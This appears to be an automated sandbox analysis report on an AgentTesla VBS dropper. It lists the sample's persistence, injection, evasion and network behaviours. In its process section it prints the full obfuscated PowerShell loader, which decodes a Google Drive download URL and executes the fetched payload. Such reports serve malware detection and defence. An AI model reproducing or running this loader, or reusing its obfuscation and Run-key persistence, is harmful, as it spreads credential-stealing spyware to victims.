Malware Analysis Report

2024-11-30 05:44

Sample ID 240619-sbce5ssdmg
Target 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs
SHA256 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19
Tags
agenttesla execution keylogger persistence spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19

Threat Level: Known bad

The file 09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs was found to be: Known bad.

Malicious Activity Summary

agenttesla execution keylogger persistence spyware stealer trojan

AgentTesla

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Command and Scripting Interpreter: PowerShell

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-19 14:56

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 14:56

Reported

2024-06-19 14:59

Platform

win7-20240611-en

Max time kernel

142s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\Delngler = "%Grusvejene% -w 1 $erasement=(Get-ItemProperty -Path 'HKCU:\\litteratursociologi\\').Hirstie;%Grusvejene% ($erasement)" | C:\Windows\SysWOW64\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000\Software\Microsoft\Windows\CurrentVersion\Run\DtcHF = "C:\\Users\\Admin\\AppData\\Roaming\\DtcHF\\DtcHF.exe" | C:\Program Files (x86)\windows mail\wab.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A
N/A | drive.google.com | N/A | N/A

Looks up external IP address via web service

Description | Indicator | Process | Target
N/A | api.ipify.org | N/A | N/A
N/A | api.ipify.org | N/A | N/A
N/A | ip-api.com | N/A | N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1700 set thread context of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Modifies registry key

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 948 wrote to memory of 916 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 916 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 948 wrote to memory of 916 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe
PID 916 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1700 wrote to memory of 2152 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2152 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\cmd.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 1700 wrote to memory of 2784 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe
PID 2784 wrote to memory of 2832 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2784 wrote to memory of 2832 | N/A | C:\Program Files (x86)\windows mail\wab.exe | C:\Windows\SysWOW64\cmd.exe
PID 2832 wrote to memory of 2652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe
PID 2832 wrote to memory of 2652 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\09e4f38027139dc19a02d92dbd3b79428cf2e93bbf49d07864ff48e43f268a19.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
'Selvmde$PigmentgSpi.dvalClimatooDefinitbSerrul.aGisnedelSono.an:SnusdaaA elieffmRavn kriOctroyatPaakrveapensionbFrostinh StttevaScoundr Eluvium= Daaru MedidiiGCivilwoefatssnat .orsto-Las.oenCWhiteeyoTelegranOlsharptParaphyeoutla,dn Smrgaatornit o Octago$InsinceHG,aasteuFlykaprsClairseeret,ingjElevatoeMantlinrBargema ');Sittas (Solidariske ' al,mos$lakf,brgDanserulCeraunooCenternbAngstroa san bll Taxame:Kinsen.Dl,geriteMultimolCon.enitUfravigoG,ycemiiPlasmoldEntosthe OpposeiBos ter1Overbef7Deterio1Temporo Klippee=Bundvan ddleda[ Rotte.S UautoryuniverssArve,latHdersmne J.rdndmSamfun .e,hegneCBronkosoBi ragsnAdipictvrh,zomoe Rotte rSbeurtetIndstte]Koers e:E,somhe: ,ntralF.usicolrSyncom o wi.nowmSubordiBColone.a Komedis aggregeTrves.r6 Kod.ci4 A,bumeSpalaeottHjemf.rrScoinsoi ugrsbonAntikvagpronymp(Ulovlig$ udarbeAUnsecurmtilkrseiBrom,prtLiripipaCounterbSyltninhOverstaaSkyggem) Alpini ');Sittas (Solidariske ' ainfu$ PockytgBoetstilRepudiao BellicbUn.emonaE ologil Ud.app:Hy,notiS NotemuaForskrkd.omputedMngderpuKwa zadk mrkatseOr,tresr Stedsse NeuropsBremse, B.ghand=U,placi ,remme[Sukke fSKaliphuyF.rsvarsSortsynt UdspejeSubartimcytolog.InsuffiTAntrit,e dpresnxExploretOmelett. visemaEUnd rstnFrimrkecSubstrsoManiabldProportiTrombocnDopingdg Pe ige]Argumen:Lyseslu: MetcalATandbylS erpenCPrognosIKippediIRavnsor.ExtradiGSpondyleT,olddotSuomivaSOr.entetGlaz ngrLuciferiGrassednLsegrupgUnrepro(Blndeaa$VkkerglDG.lleaseg,effotl Sunnitt Stopplofo.mateiKulturkd springeB.lysnii adeno.1Attaknx7 Chromo1 Keywor)Hobbyis ');Sittas (Solidariske 'Doorbra$Unre.rogIntimeslAandrigoFaktotubFrondesa E.tomel Superm: lakfjedKlavreieStyresybRapsma a ,ertugtPro.esss Ke.misk TranspuBoss.eteTollgatsNaboberpStrmkreiSmoothllsympatil Dik.afechoristnTrangf,eJicaques Skrter= ektifi$BorgerpSSpratteaIneffecd ExtraddKvasteru Gtzrenk Immun,eDa.nemornon.ucteUnderbesRynketf. 
Ribliks kinemauDemontfbSisyphesUdenbomtSemiquarAgrogeoiDo,mefanFlash.fgKravles(Vaticdi$Ukor ekF Stv,olrAntikkey Arbejds.bmandseFl.tellp Im.lauu fsvalenSekstenkSubsysttRim.nsasGrussefsEndepunnTricenak SelefanKlanhvdiCentrifnTubuleug.aandpae Py,itir PeenedsUnsuper,Catena $ allouBNonfuseeConstrasSk,tteeyForkbsrn SeiningDeneb.le,drtsfonFrimrkedBody.uaeKaloriu) Delega ');Sittas $debatskuespillenes;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Restauratrens.Alb && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Clergywoman = 1;$Trubadurs='ring';$Didepside59='S';Function Solidariske($Viveths){$Bataljons=$Viveths.Length-$Clergywoman;$Anticonventionalist=$Didepside59+'ubst'+$Trubadurs;For( $Spiralism=7;$Spiralism -lt $Bataljons;$Spiralism+=8){$anstrengelsens+=$Viveths.$Anticonventionalist.Invoke( $Spiralism, $Clergywoman);}$anstrengelsens;}function Sittas($Aners){ . ($Cyclonology) ($Aners);}$Mishits=Solidariske 'Pryg.stM Theat oTracheozAfrohaaiNonperclEmulgerlBrandskaPsy.olo/,elebre5Anlgsre.Suckedl0Legetj. Adfrdss( Pla erW YppedeiStr.alenV lorizdTankageoHypokonwOutwilesPaleoen DamoklNSignifiTArbejde Abduce1Pas.ern0Erfarin.Farfets0Idiochr;Dismaya Spkn,nWPermitti.avelannTorsion6Brndest4 Standt;Buskvks LammeboxNappish6 ekster4lsterne;,teadim StripaerMisnomev Puf.op: Reacce1Acciden2Navlebi1St,icis.Pit pro0Syndact)Prionus MoonrisGBeermakeSa iggrcSurrogak SpeciaoOverfat/Vanda i2Hy,rosa0Hex,cti1Blastop0M dlber0Unusage1Bombast0Tho.ung1Ildsluk PhytocFGibbetsiBluebilrpropagaemusi ekfmedtnktoNonfi rx Pre,dv/ Aurifi1Csectst2inventa1samplin.Invitin0Svbesla ';$Staphylinoidea=Solidariske 'EvaginaU Aalb.tsMicrofie Florifr Flades-A,jobasAAngariag JollereP eventnSilverrtdramati ';$Bulbideres=Solidariske 'Staalvgh UddanntZumat ctVrgelshpToyshopsAuktion:Bereave/Vilipen/UberegndMultifor VirkemipromissvVelformeBussero.G mpedlgprofi.eoMantlepoWesterngKibbutzlJvn rafe Inscri. rugergc fderaloCromb emMisdeli/TeleolouArchvisc mat.oh? 
Bl dpleAngivelxLogf lep BajereoSmmometrEufor stKuppets= Nunc edHusf.deoFornemmwOverenunOmgangslClearinoCaducaraHeksesadAvecsgi&Hstenc iAndelsbd Urbane=,ftrred1gamelanx oleremHPseudofxTubaphovOvulary0O,erappX ormaldIDatakopoLokalplJ EgyptopSnderknlFell,teRBacteriz etsindm Mongr.FMaltlleT ctinozZ FodersRUnpulsa3Doryp o1,dstjerpEutychiGAlarmf fBelzebu0 Unse.sxParitetJEmpiricEApachitv PosttaRU.ungunAExcimeri Bagpi.n Idiosy ';$Termografens=Solidariske ' Blatti>Trendin ';$Cyclonology=Solidariske 'HeksejaiSaneneseTicktacxCom,ove ';$Kenns='Overkommer75';$Shandyism52 = Solidariske 'NonprogeAttitudc MalleehGenerero P.cher slavel % StorsvaAfm.litp Pictu,pAgurketdI,deslua tilletinterp.aRefires%Bed bes\F,rbrdrRUbesluteHyper,rsRimalfrtBevillia DefiniuFred gsr Ret,ska BlgekatDingeinrfor andeTerrnlbnCirkusesEsca,te.lyratelAFetaostlGriskesbkredito Dekagr.&Re.onst&Gratule Paalsn,eSammensckeysterh Korts.oTragic, klamphutstbe ie ';Sittas (Solidariske ' Tilmel$Fore.igg hemat lM,riavio MagnetbSteffe aSol,difl,ovings:NonfactSPyribo.p StylterSubjectaTrichotu LoverlcBitrykkhUnderkrl.onintee Teknold.lendef=Formul ( Toas,ycBaryle.m Conon.dskaglen emulge/Indslu,c ultraf Hyper y$ HeraclS.ioresihEngraula LykkernR.duktidVan,dicyUdebleviFriktios ,harlim oebma5Paddyis2Fa.tasi)Vddende ');Sittas (Solidariske ' Coerce$AvaischgSn,halel Chauvio Interab Udl,dnaSelvejelIsenkrm:D,cibelF SpeakaaShortstdPlumyaveDansantrSursdessNonconvk EksamiaRadioblbInsignieHns,husr FdningnKodoguse Hoberfs betwit=Insinu.$UdmugniBKundemduPrf,renlNonqu lbVrdilstiLeefpardberrigaeLivsener AnticoeRepre,ssNdigkoo.Erhverss TilflypOutfindlClappeoiSvumpuktdecos,a(Monothe$SuburbaTAgatewae AnnularKoltunnmInt,rraoStrati,gGr,vsorrTranquiaI stigafIns,mine ervesnBilleprsF rsvar) Ve bal ');Sittas (Solidariske 'Seismis[FedtldeN BrugereRestlagtForvetd.CarolinS,lyedesetilegnerKonkludv MystifiS rewdncNonvoteeslgtsp P.rumbasoAlgegifiSpatlern VristetPremenaMStoragtaRepacefnWictoraaVaku.mpgCancer eMolasserAfs,emp] 
Raclet:specime:ZinkbleSIndtrkpePhlegmac ByggetuVinegarrFractioiS,akalhtDatabrayFuturumPDeponerr Bitryko FluviotSeamersoResewnhc,riststoSchchtnlExsp li Poachie=Nonincl Protria[MyomancNGra,spue KnighttSekunda.ExudatoSJordfsteCyther cPartietu Opinior A,glutiHypod.rt RaajoryF,ngsnoPKritisarcondenso btrusitthirtysounshrinc snoh,loDisparklsystemoT alismaybasguitp haabe eOrn,rym]Overgra:Chilopo:BankbooTBen eedlSk.tteosAarsrap1smulers2 Reproa ');$Bulbideres=$Faderskabernes[0];$Cajeputol= (Solidariske 'Lettes $ArthrobgKogeplalT.lsvaroMetamorb NeonetadannebrlTabulat:PewmateMSoergesiarbejdes MicrodyRehu bloHandi.akUnprosoeE.termedShallow=Porr.maN strutteInconsowNo.corr-PersonaOCatabapbsodomitjneuraleeant goncLetlevetPreappr CanfulsSAggr.mmy SurrejsFordelitEunuchieT tjanam.fperso. beskydNste.cile Docklat,ortkas.C reddaWTab ureeHarmonibStudeopCstiknarlRagelsei GrindeeDeterminCoin wet');$Cajeputol+=$Sprauchled[1];Sittas ($Cajeputol);Sittas (Solidariske 'Maskuli$Hippo.hMReserveiBorddamsCountery ThrawioMbelpolkEnligsteFamiliadRoug,sh.InddataHSubaroueRaftl.kaDistintdStatskae CopperrCiselrisT,dsats[Membran$OrlovsoSPa ementUnderbiar dsefjpMideskuhEmbedsmyTempelilBore oriPraktisn DominaoHegn neiKunstindMakrot.eJoniseraMakrore]Homebre=Interso$fistu aM BatteriDekkonosNonjurehDiauheriBarslertPalapals Brixvo ');$Uforsvarligheden=Solidariske '.orovad$Uncha.tMDiduncui BrolggsGenfi,dyMo sieuoGaa.dhakKnejpereI tratidCanonis. 
Plas,vDVenereooSandartwPrevllinYdedygtl ToholdoMu,chieaYderpardSadduk FGu lereiCynghanl Ga vaneFlygele(doping $ .estanBOutjutsuSlvholdlShintorbopslm,iiGuaymi.dDip.skoeC,efdelrCashboyeEksaminsUnrepro,Matro e$ OverkoHNann.ttuShoddywsEl,evtee Faconnj Sund,eeVagab nrLavis.e)Bortvlg ';$Husejer=$Sprauchled[0];Sittas (Solidariske ' orstzo$Begivengluta islV.catiooMeshuggbSwah,lia SatinflInter,e:AnordniRWalkyrieDissonedXylocopeamla racGardenwopuncheorCancellaBlockietMi kicke Floc i=un.arie(PostillT RullesePoutiersRepetitt dime.a- SkafthP.rwinnraZe zuictch etaehLensaf, Skruden$GasolinHRester u Aktieks ChartaeRegistrj Avoi,ee BycentrSnorkso) Rigtig ');while (!$Redecorate) {Sittas (Solidariske 'Tropica$Gu fadegSanemo,lBibbasmo Ma chsb F,orisadrik ellClogwoo: SubfunWS,ltetjhGsternei ectocen Swagge=Strkban$BjerglatWaterlerSkrllemuVentekjeBerigni ') ;Sittas $Uforsvarligheden;Sittas (Solidariske ' ThecapSK.llagetGooseneasognekirSvanshatRebathi-PotensfSPorkpenlWamese,eguthreyeoutpricptermobe Gharn o4Refluxe ');Sittas (Solidariske 'Archido$RedesiggtablemalTil.ysnoAfpolitbKnight.a DgisuclFllessk:AdfrdsvR ImmunoeAmplicads bclaueSweaterc JoulesoBuestrgrBegotteaSkiltnit Bawdrie Malpi.=Klarere( Vild.sTfo.sonieAuhemits Trkl.st P roti-UndermuP valvulaBimb,estEndoglohsuborns A olian$ CoharmH.dgrdenuWincerssMellemkefo.kepejbookbineGa.turbrclocked)Sulf,va ') ;Sittas (Solidariske 'Valetho$QuailhegDod,canlKalciumo SkrvebbCyneg.taCleatunl,elioty:SelfishPacutesmlCopperpu DirectnAvionickDvorakseDuffe cd Odouro=Cardiag$ UncoatgU,deputlRedistioSpillwabPetrosuaToxic,plProd,kt:compresFNervomurarrangeyAntifatnSpil.evsRen,ejee InformnPre,egidLa,njkjeBruskha+Foromta+Dds ill%Allomuc$FoliestF MarnasaGriecepd teg,ineGizdhubrTantrafsSylternk Pla abafribillbFootcaneDirectorlxxmas.n St abieChemi tsPar,ici.DezincicSdefdsloMillefluAbsurdinKonstantLnindeh ') ;$Bulbideres=$Faderskabernes[$Plunked];}$Frysepunktssnkningers=336625;$Besyngende=28489;Sittas (Solidariske 
